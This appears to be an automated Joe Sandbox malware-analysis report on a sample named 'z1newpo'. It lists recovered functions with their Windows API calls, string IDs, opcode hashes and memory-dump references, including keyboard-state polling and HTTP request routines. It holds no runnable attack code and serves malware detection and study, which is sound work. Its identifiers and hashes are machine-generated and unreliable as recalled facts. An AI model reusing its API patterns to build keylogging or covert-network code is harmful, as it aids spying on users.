                                                    • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                    • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(000000A1), ref: 004448C8
• GetKeyState.USER32(000000A1), ref: 004448D9
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetKeyState.USER32(00000011), ref: 00444903
• GetAsyncKeyState.USER32(00000012), ref: 0044491F
• GetKeyState.USER32(00000012), ref: 0044492D
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
• GetKeyState.USER32(0000005B), ref: 00444958
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
• Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
• Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
• Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
• Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
• Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
• Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: AddressProc_free_malloc$_strcat_strlen
• String ID: AU3_FreeVar
• API String ID: 2634073740-771828931
• Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
• Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
• Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
• Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
APIs
• CoInitialize.OLE32 ref: 0046C63A
• CoUninitialize.OLE32 ref: 0046C645
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
• CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
• CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
• IIDFromString.OLE32(?,?), ref: 0046C705
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 2294789929-1287834457
• Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
• Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
• Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
• Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
APIs
  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
• DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
• ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
• ImageList_EndDrag.COMCTL32 ref: 00471169
• ReleaseCapture.USER32 ref: 0047116F
• SetWindowTextW.USER32(?,00000000), ref: 00471206
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 2483343779-2107944366
• Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
• Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
• Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
• Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
• _wcslen.LIBCMT ref: 00450720
• _wcscat.LIBCMT ref: 00450733
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
• Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
• Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
• Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
• Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
• GetDlgCtrlID.USER32(00000000), ref: 00469C84
• GetParent.USER32 ref: 00469C98
• SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
• GetDlgCtrlID.USER32(00000000), ref: 00469CA5
• GetParent.USER32 ref: 00469CBC
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2360848162-1403004172
• Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
• Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 262282135-0
• Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
• Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
• Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
• SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
• Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
• Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    Similarity
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    APIs
                                                    • CreateMenu.USER32 ref: 00448603
                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                    • IsMenu.USER32(?), ref: 004486AB
                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                    Similarity
                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    Similarity
                                                    • API ID: _memmove$_memcmp
                                                    • String ID: '$\$h
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                    Strings
                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                    Similarity
                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                    APIs
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                    • String ID: @COM_EVENTOBJ
                                                    APIs
                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                    • String ID: H
                                                    • API String ID: 3613100350-2852464175
                                                    • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                    Strings
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 4174999648-3243417748
                                                    • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Similarity
                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1291720006-3916222277
                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                    Strings
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                    Strings
                                                    Similarity
                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                    • String ID: crts
                                                    • API String ID: 586820018-3724388283
                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                    Strings
                                                    Similarity
                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2326526234-1173974218
                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                    APIs
                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                    • _wcslen.LIBCMT ref: 004335F2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
